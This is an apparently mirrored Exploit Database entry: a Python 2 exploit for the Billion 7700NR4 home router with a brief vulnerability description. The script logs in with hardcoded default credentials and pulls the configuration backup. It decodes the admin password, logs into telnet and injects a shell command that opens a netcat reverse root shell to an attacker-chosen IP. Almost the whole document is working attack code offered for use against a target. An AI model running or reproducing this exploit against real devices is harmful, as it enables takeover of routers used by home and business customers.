Billion 7700NR4 Router – Remote Command Execution

• Exploit Database
• 22 阅读

• 作者： R-73eN
  日期： 2016-10-06
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/40472/

• # Title : Billion Router 7700NR4 Remote Root Command Execution
  # Date : 06/10/2016
  # Author : R-73eN
  # Tested on: Billion Router 7700NR4 
  # Vendor : http://www.billion.com/
  # Vulnerability Description:
  # This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users.
  # The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these 
  # credentials we don't have to much access but the lack of authentication security we can download the backup and get the admin password.
  # Using that password we can login to telnet server and use a shell escape to get a reverse root connection.
  # You must change host with the target and reverse_ip with your attacking ip.
  # Fix:
  # The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables. 
  #
  
  import requests
  import base64
  import socket
  import time
  
  host = ""
  def_user = "user"
  def_pass = "user"
  reverse_ip = ""
  #Banner
  banner = ""
  banner +="_________ __\n"
  banner +=" |_ _|_ __/ _| ___/ ___| ___ _ __/ \| |\n"
  banner +="| || '_ \| |_ / _ \| |_ / _ \ '_ \/ _ \ | |\n"
  banner +="| || | | |_| (_) | |_| |__/ | | |/ ___ \| |___ \n"
  banner +=" |___|_| |_|_|\___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
  print banner
  
  
  # limited shell escape
  evil = 'ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip+ ' 1337 0<backpipe | /bin/sh 1>backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &'
  
  def execute_payload(password):
  	print "[+] Please run nc -lvp 1337 and then press any key [+]"
  	raw_input()
  	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  	s.connect((host,23))
  	s.recv(1024)
  	s.send("admin\r")
  	a= s.recv(1024)
  	time.sleep(1)
  	s.send(password +"\r")
  	time.sleep(1)
  	s.recv(1024)
  	s.send(evil + "\r")
  	time.sleep(1)
  	print "[+] If everything worked you should get a reverse shell [+]"
  	print "[+] Warning pressing any key will close the SHELL [+]"
  	raw_input()
  
  
  
  
  r = requests.get("http://" + host + "/backupsettings.conf" , auth=(def_user,def_pass))
  if(r.status_code == 200):
  	print "[+] Seems the exploit worked [+]"
  	print "[+] Dumping data . . . [+]"
  	temp = r.text
  	admin_pass = temp.split("<AdminPassword>")[1].split("</AdminPassword>")[0]
  #	print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]"
  	execute_payload(str(base64.b64decode(admin_pass)))
  else:
  	print "[-] Exploit Failed [-]"
  print "\n[+] https://www.infogen.al/ [+]\n\n"